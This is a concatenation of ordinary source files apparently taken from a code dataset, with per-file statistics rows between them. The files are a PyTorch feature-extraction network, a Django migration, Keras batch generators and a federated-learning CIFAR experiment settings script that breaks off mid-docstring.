nn.Conv2d(8, 8, 1, 1, 0, bias=False),
)
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x, image_left):
#feature_size = x.size()
output = self.firstconv(x)
output_residual = output
#print("output size:", output.shape)
output = self.layer1(output)
#print("output size:", output.shape)
output_raw = self.layer2(output)
#print("output size:", output_raw.shape)
output = self.layer3(output_raw)
#print("output_residual size:", output_residual.shape)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.upsample(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.upsample(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.upsample(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.upsample(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature_1 = self.lastconv(output_feature)
#print("output_feature_1 size:", output_feature_1.shape)
if image_left:
output_feature_2 =self.up_sample_1(output_feature_1)
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = torch.cat((output_feature_2, output_residual), 1 )
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = self.output_feature_2(output_feature_2)
#output_CSPN = F.upsample(output_feature_2, (output_skip.size()[2]*4, output_skip.size()[3]*4), mode='bilinear')
output_CSPN = self.up_sample_2(output_feature_2)
output_CSPN = self.output_CSPN(output_CSPN)
return output_feature_1, output_feature_2, output_CSPN
else:
return output_feature_1
class Hybrid_Net_feature(nn.Module):
def __init__(self, activation_types1 = "ELU"):
super(Hybrid_Net_feature, self).__init__()
self.inplanes = 16
self.inplanes2 = 32
self.inplanes4 = 64
self.inplanes10 = 160
self.firstconv = nn.Sequential(convbn(3, self.inplanes, 3, 2, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(BasicBlock, self.inplanes, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, self.inplanes2, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.lastconv = nn.Sequential(convbn(320 // 2, 128 // 2, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
nn.Conv2d(128 // 2, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.up_sample_1 =nn.Sequential( nn.ConvTranspose2d(32, 32, 3, 2, 1, output_padding=1, bias=False))
self.up_sample_2 = nn.Sequential( nn.ConvTranspose2d(16, 16, 3, 2, 1, output_padding=1, bias=False))
self.output_feature_2 = nn.Sequential(convbn(48, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(16, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
nn.Conv2d(16, 16, kernel_size=1, padding=0, stride=1, bias=False),
#nn.ReLU(inplace=True)
)
self.output_CSPN = nn.Sequential(
convbn(16 , 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
# nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 8, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
nn.Conv2d(8, 8, 1, 1, 0, bias=False),
)
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x, image_left):
#feature_size = x.size()
output = self.firstconv(x)
output_residual = output # 1/2
output = self.layer1(output)
#print("output size:", output.shape)
output_raw = self.layer2(output)
#print("output size:", output_raw.shape)
output = self.layer3(output_raw)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.upsample(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.upsample(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.upsample(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.upsample(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature_1 = self.lastconv(output_feature)
#print("output_feature_1 size:", output_feature_1.shape)
output_feature_2 =self.up_sample_1(output_feature_1)
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = torch.cat((output_feature_2, output_residual), 1 )
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = self.output_feature_2(output_feature_2)
if image_left:
output_CSPN = self.up_sample_2(output_feature_2)
output_CSPN = self.output_CSPN(output_CSPN)
return output_feature_1, output_feature_2, output_CSPN
else:
return output_feature_1, output_feature_2
| 41.153684 | 124 | 0.497391 | 2,073 | 19,548 | 4.512783 | 0.053546 | 0.018172 | 0.052806 | 0.069054 | 0.946446 | 0.938856 | 0.930839 | 0.919615 | 0.916729 | 0.916729 | 0 | 0.070075 | 0.392623 | 19,548 | 474 | 125 | 41.240506 | 0.717847 | 0.072232 | 0 | 0.849624 | 0 | 0 | 0.005473 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033835 | false | 0 | 0.022556 | 0 | 0.097744 | 0.003759 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3838c56e4dd6f2708e76124b2556fa8c902d9040 | 117 | py | Python | presidio-analyzer/analyzer/__init__.py | kant/presidio | af7d82bde7e978313a11a7281eac961697bbe164 | [
"MIT"
] | null | null | null | presidio-analyzer/analyzer/__init__.py | kant/presidio | af7d82bde7e978313a11a7281eac961697bbe164 | [
"MIT"
] | null | null | null | presidio-analyzer/analyzer/__init__.py | kant/presidio | af7d82bde7e978313a11a7281eac961697bbe164 | [
"MIT"
] | null | null | null | import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(
os.path.abspath(__file__))) + "/analyzer")
| 23.4 | 48 | 0.726496 | 18 | 117 | 4.5 | 0.5 | 0.222222 | 0.320988 | 0.37037 | 0.395062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 117 | 4 | 49 | 29.25 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
383bb1ed3dc028b9a378922fd32f3ac60ad733c2 | 1,849 | py | Python | custom/aaa/migrations/0008_auto_20190410_1952.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2020-05-05T13:10:01.000Z | 2020-05-05T13:10:01.000Z | custom/aaa/migrations/0008_auto_20190410_1952.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2019-12-09T14:00:14.000Z | 2019-12-09T14:00:14.000Z | custom/aaa/migrations/0008_auto_20190410_1952.py | MaciejChoromanski/commcare-hq | fd7f65362d56d73b75a2c20d2afeabbc70876867 | [
"BSD-3-Clause"
] | 5 | 2015-11-30T13:12:45.000Z | 2019-07-01T19:27:07.000Z | # -*- coding: utf-8 -*-
# flake8: noqa
# Generated by Django 1.11.20 on 2019-04-10 19:52
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('aaa', '0007_auto_20190319_2225'),
]
operations = [
migrations.AlterField(
model_name='aggawc',
name='high_risk_pregnancies',
field=models.PositiveIntegerField(help_text='hrp=yes when the ccs record was open and pregnant during the month', null=True),
),
migrations.AlterField(
model_name='aggawc',
name='institutional_deliveries',
field=models.PositiveIntegerField(help_text="add in this month and child_birth_location = 'hospital' regardless of open status", null=True),
),
migrations.AlterField(
model_name='aggawc',
name='total_deliveries',
field=models.PositiveIntegerField(help_text='add in this month regardless of open status', null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='high_risk_pregnancies',
field=models.PositiveIntegerField(help_text='hrp=yes when the ccs record was open and pregnant during the month', null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='institutional_deliveries',
field=models.PositiveIntegerField(help_text="add in this month and child_birth_location = 'hospital' regardless of open status", null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='total_deliveries',
field=models.PositiveIntegerField(help_text='add in this month regardless of open status', null=True),
),
]
| 39.340426 | 152 | 0.647918 | 201 | 1,849 | 5.79602 | 0.368159 | 0.103004 | 0.128755 | 0.149356 | 0.817167 | 0.817167 | 0.787124 | 0.787124 | 0.76824 | 0.76824 | 0 | 0.025436 | 0.255814 | 1,849 | 46 | 153 | 40.195652 | 0.821221 | 0.044348 | 0 | 0.789474 | 1 | 0 | 0.326716 | 0.064095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
699bcaff1d942228de5c0679184eed06fc2f9688 | 141 | py | Python | agents/NPG/__init__.py | best99317/Deep-RL-Package | 8a6fe4d80c3ab12d062d6aeecac5a50ac5144aad | [
"MIT"
] | 1 | 2020-11-23T13:01:50.000Z | 2020-11-23T13:01:50.000Z | agents/NPG/__init__.py | best99317/Deep-RL-Package | 8a6fe4d80c3ab12d062d6aeecac5a50ac5144aad | [
"MIT"
] | null | null | null | agents/NPG/__init__.py | best99317/Deep-RL-Package | 8a6fe4d80c3ab12d062d6aeecac5a50ac5144aad | [
"MIT"
] | null | null | null | from agents.NPG.NPG import *
from agents.NPG.NPG_Softmax import *
from agents.NPG.NPG_Gaussian import *
from agents.NPG.run_npg import *
| 28.2 | 38 | 0.77305 | 23 | 141 | 4.608696 | 0.304348 | 0.377358 | 0.490566 | 0.45283 | 0.415094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141844 | 141 | 4 | 39 | 35.25 | 0.876033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0e0c4b42325c5b246a0530dd13736da05baa591a | 190 | py | Python | Problems/Preprocessing/task.py | DaospinaDLAB/coffee_machine | 2e4b62142f472a1fab29082fa80b152ed9b8904f | [
"Apache-2.0"
] | null | null | null | Problems/Preprocessing/task.py | DaospinaDLAB/coffee_machine | 2e4b62142f472a1fab29082fa80b152ed9b8904f | [
"Apache-2.0"
] | null | null | null | Problems/Preprocessing/task.py | DaospinaDLAB/coffee_machine | 2e4b62142f472a1fab29082fa80b152ed9b8904f | [
"Apache-2.0"
] | null | null | null | sentence = input()
sentence = sentence.replace("!", "")
sentence = sentence.replace(",", "")
sentence = sentence.replace(".", "")
sentence = sentence.replace("?", "")
print(sentence.lower()) | 31.666667 | 36 | 0.647368 | 17 | 190 | 7.235294 | 0.294118 | 0.520325 | 0.747967 | 0.756098 | 0.747967 | 0.747967 | 0.747967 | 0.747967 | 0.747967 | 0 | 0 | 0 | 0.1 | 190 | 6 | 37 | 31.666667 | 0.719298 | 0 | 0 | 0 | 0 | 0 | 0.020942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
384f90d7f5e523ec3032d464d70da0fc74bdab18 | 4,263 | py | Python | src/training_utils.py | talshapira/SASA | 70db6ba36d7602e46fbb95b6a3cac822c8af2ab9 | [
"MIT"
] | null | null | null | src/training_utils.py | talshapira/SASA | 70db6ba36d7602e46fbb95b6a3cac822c8af2ab9 | [
"MIT"
] | null | null | null | src/training_utils.py | talshapira/SASA | 70db6ba36d7602e46fbb95b6a3cac822c8af2ab9 | [
"MIT"
] | null | null | null | import numpy as np
from imblearn.keras import balanced_batch_generator
def balanced_generator(features, labels, batch_size, input_shape, use_embedding=False, random_state=None):
indexes = np.arange(len(features)).reshape((len(features), 1))
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 0
while True:
index += 1
if index > steps_per_epoch:
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 1
batch_indexes, batch_labels = next(training_generator)
if not use_embedding:
yield features[batch_indexes].reshape((batch_size,input_shape[0],input_shape[1])), batch_labels
else:
yield features[batch_indexes].reshape((batch_size,input_shape[0])), batch_labels
def generator(features, labels, batch_size):
index = 0
while True:
index += batch_size
if index >= len(features):
batch_features = np.append(features[index-batch_size:len(features)], features[0:index-len(features)], axis=0)
batch_labels = np.append(labels[index-batch_size:len(features)], labels[0:index-len(features)], axis=0)
index -= len(features)
yield batch_features, batch_labels
else:
yield features[index-batch_size:index], labels[index-batch_size:index]
def val_generator(features, labels, val_batch_size):
index = 0
while True:
index += val_batch_size
batch_features, batch_labels = features[index-val_batch_size:index], labels[index-val_batch_size:index]
if index >= len(features):
index = 0
yield batch_features, batch_labels
def balanced_sources_generator(features, sources, labels, batch_size, input_shape, use_embedding=False, random_state=None):
indexes = np.arange(len(features)).reshape((len(features), 1))
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 0
while True:
index += 1
if index > steps_per_epoch:
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 1
batch_indexes, batch_labels = next(training_generator)
if not use_embedding:
yield [features[batch_indexes].reshape((batch_size,input_shape[0],input_shape[1])), sources[batch_indexes].reshape((batch_size,input_shape[0]))], batch_labels
else:
yield [features[batch_indexes].reshape((batch_size,input_shape[0])), sources[batch_indexes].reshape((batch_size,input_shape[0]))], batch_labels
def sources_generator(features, sources, labels, batch_size):
index = 0
while True:
index += batch_size
if index >= len(features):
batch_features = np.append(features[index-batch_size:len(features)], features[0:index-len(features)], axis=0)
batch_sources = np.append(sources[index-batch_size:len(features)], sources[0:index-len(features)], axis=0)
batch_labels = np.append(labels[index-batch_size:len(features)], labels[0:index-len(features)], axis=0)
index -= len(features)
yield [batch_features, batch_sources], batch_labels
else:
yield [features[index-batch_size:index], sources[index-batch_size:index]] , labels[index-batch_size:index]
def val_sources_generator(features, sources, labels, val_batch_size):
index = 0
while True:
index += val_batch_size
batch_features, batch_labels = features[index-val_batch_size:index], labels[index-val_batch_size:index]
batch_sources = sources[index-val_batch_size:index]
if index >= len(features):
index = 0
yield [batch_features, batch_sources], batch_labels
| 47.366667 | 170 | 0.657049 | 521 | 4,263 | 5.105566 | 0.084453 | 0.131955 | 0.073684 | 0.057143 | 0.942105 | 0.906015 | 0.906015 | 0.873308 | 0.873308 | 0.846992 | 0 | 0.00995 | 0.245602 | 4,263 | 89 | 171 | 47.898876 | 0.817164 | 0 | 0 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
386049733f3e85d6d8f1eaf34d6e014497685623 | 14,801 | py | Python | setting_cifar.py | aouedions11/SSFL-Benchmarking-Semi-supervised-Federated-Learning | 78aec81919bf95ed4677d0e0a4ebbbe3be455742 | [
"MIT"
] | 1 | 2021-09-17T17:04:02.000Z | 2021-09-17T17:04:02.000Z | setting_cifar.py | aouedions11/SSFL-Benchmarking-Semi-supervised-Federated-Learning | 78aec81919bf95ed4677d0e0a4ebbbe3be455742 | [
"MIT"
] | null | null | null | setting_cifar.py | aouedions11/SSFL-Benchmarking-Semi-supervised-Federated-Learning | 78aec81919bf95ed4677d0e0a4ebbbe3be455742 | [
"MIT"
] | null | null | null | """
##########
Assume the number of UEs is K
***************************************************************************************************************************************
size: size = K + 1 (server);
cp: cp in {2, 4, 8, 16} is frequency of communication; cp = 2 means UEs ans server communicates every 2 iterations;
basicLabelRatio: basicLabelRatio in {0.1, 0.2, 0.3, 0.4, ..., 0.9, 1.0}, is the degree of data dispersion for each UE,
basicLabelRatio = 0.0 means UE has the same amount of samples in each class; basicLabelRatio = 1.0 samples owned
by UE all belong to the same class;
model: model in {'res', 'res_gn'}; model = 'res' means we use ResNet18 + BN; model = 'res_gn' means we use ResNet18 + GN;
iid: iid in {0, 1}; iid = 1 is the ; iid = 0 is the Non- ;
num_comm_ue: num_comm_ue in {1, 2, ..., K}; a communication user number per iteration;
k_img: the number of training samples used in one epoch;
H: H in {0, 1}; use grouping-based model average method or not; H = 1 means we use grouping-based method;
GPU_list: GPU_list is a string; GPU_list = '01' means we use GPU0 and GPU1 for training;
num_data_server: num_data_server in {1000, 4000}, number of labeled samples in server
***************************************************************************************************************************************
"""
import numpy as np
import scipy.io as scio
import os
path_setting = './Setting/cifar/'
if not os.path.exists(path_setting):
os.makedirs(path_setting)
"""
Exper 1:
(1) 10 users, each one only has the accessto one class data R = 1.0, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 1.0
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting1.npy', dictionary1)
"""
Exper 1:
(2) 10 users, R = 0.0, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.0
iid = 1
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting2.npy', dictionary2)
"""
Exper 1:
(3) 10 users, R = 0.2, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.2
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting3.npy', dictionary3)
"""
Exper 1:
(4) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting4.npy', dictionary4)
"""
Exper 1:
(5) 10 users, R = 0.6, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.6
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary5 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper1_setting5.npy', dictionary5)
"""
Exper 1:
(6) 10 users, R = 0.8, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.8
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary6 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper1_setting6.npy', dictionary5)
"""
Exper 2:
(1) 10 users, R = 0.4, Communication period = 2;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [2]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting1.npy', dictionary1)
"""
Exper 2:
(2) 10 users, R = 0.4, Communication period = 4;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [4]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting2.npy', dictionary2)
"""
Exper 2:
(3) 10 users, R = 0.4, Communication period = 8;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [8]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting3.npy', dictionary3)
"""
Exper 2:
(4) 10 users, R = 0.4, Communication period = 32;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [32]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting4.npy', dictionary4)
"""
Exper 3:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 2000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 2000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting1.npy', dictionary1)
"""
Exper 3:
(2) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 3000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 3000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting2.npy', dictionary2)
"""
Exper 3:
(3) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 4000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 4000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting3.npy', dictionary3)
"""
Exper 4:
(1) 20 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
